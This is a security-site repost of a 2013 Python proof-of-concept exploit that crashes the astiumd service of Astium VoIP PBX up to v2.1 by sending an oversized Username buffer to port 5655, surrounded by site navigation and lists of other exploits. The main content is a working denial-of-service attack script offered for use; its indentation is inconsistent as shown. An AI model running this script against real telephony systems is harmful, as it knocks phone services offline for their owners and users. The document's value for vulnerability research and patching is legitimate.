首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC
来源:xistence<[AT]>0x90.nl 作者:xistence 发布时间:2013-01-04  

#!/usr/bin/python
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     : Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC
# Date              : 01-02-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en
# Vendor site       : http://www.oneip.nl/
# Version           : v2.1 build 25399
# Tested on         : CentOS 5.x 32-bit
#
# Vulnerability     : The "astiumd" service on port 5655 crashes and restarts when sending a large buffer.
#      
#        Entries in /var/log/astiumd.log after executing script:
#                     Astiumd ended with exit status 139 <-- Segmentation Fault
#        Automatically restarting Astiumd
#+--------------------------------------------------------------------------------------------------------------------------------+


import socket, sys

port = 5655
payload = "\x41"*10000

print ""
print "[*] Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02"
print ""

if (len(sys.argv) != 2):
    print "[*] Usage: " + sys.argv[0] + " <RHOST>"
    print ""
    exit(0)

rhost = sys.argv[1]

try:
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((rhost,port))
        data = s.recv(1024)
        print "[*] %s" %data
 print "[*] Sending payload!"
        s.send("Action: Login\r\n")
        s.send("Username: " + payload + "\r\n")
        s.send("Secret: hax0r\r\n")
        s.send("\r\n")
 s.close()
except:
 print "Error!"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Astium VoIP PBX 2.1 Remote Roo
·Allied Telesis AT-MCF2000M 3.0
·Microsoft Internet Explorer CB
·WordPress Plugin Advanced Cust
·BlazeDVD 6.1 PLF Exploit DEP/A
·Ratbox IRCd Denial Of Service
·Aktiv Player 2.80 Crash PoC
·Enterasys NetSight nssyslogd.e
·Microsoft Internet Explorer CD
·FoxPlayer v2.9.0 Denial of Ser
·IBM Lotus QuickR qp2 ActiveX B
·Foxit Reader <= 5.4.4.1128 Fir
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved